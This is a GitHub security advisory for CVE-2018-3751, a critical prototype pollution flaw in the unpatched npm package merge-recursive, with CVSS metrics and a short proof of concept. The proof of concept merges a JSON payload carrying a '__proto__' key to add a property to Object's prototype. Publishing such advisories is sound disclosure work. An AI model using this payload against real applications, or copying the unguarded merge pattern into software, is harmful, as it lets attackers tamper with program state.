Skip to content

Prototype Pollution in merge-recursive

Critical severity GitHub Reviewed Published Sep 18, 2018 to the GitHub Advisory Database • Updated Sep 12, 2023

Package

npm merge-recursive (npm)

Affected versions

<= 0.0.3

Patched versions

None

Description

All versions of merge-recursive are vulnerable to Prototype Pollution. When malicious user input is merged with another object it allows the attacker to modify the prototype of Object via __proto__ causing the addition or modification of an existing property.

Proof of concept:

var merge = require('merge-recursive').recursive;
var malicious_payload = '{"__proto__":{"oops":"It works !"}}';

var a = {};
console.log("Before : " + a.oops);
merge({}, JSON.parse(malicious_payload));
console.log("After : " + a.oops);

Recommendation

There is currently no fix available.

References

Published to the GitHub Advisory Database Sep 18, 2018
Reviewed Jun 16, 2020
Last updated Sep 12, 2023

Severity

Critical
9.8
/ 10

CVSS base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Weaknesses

CVE ID

CVE-2018-3751

GHSA ID

GHSA-cvxm-f295-x957

Source code

No known source code
Checking history
See something to contribute? Suggest improvements for this vulnerability.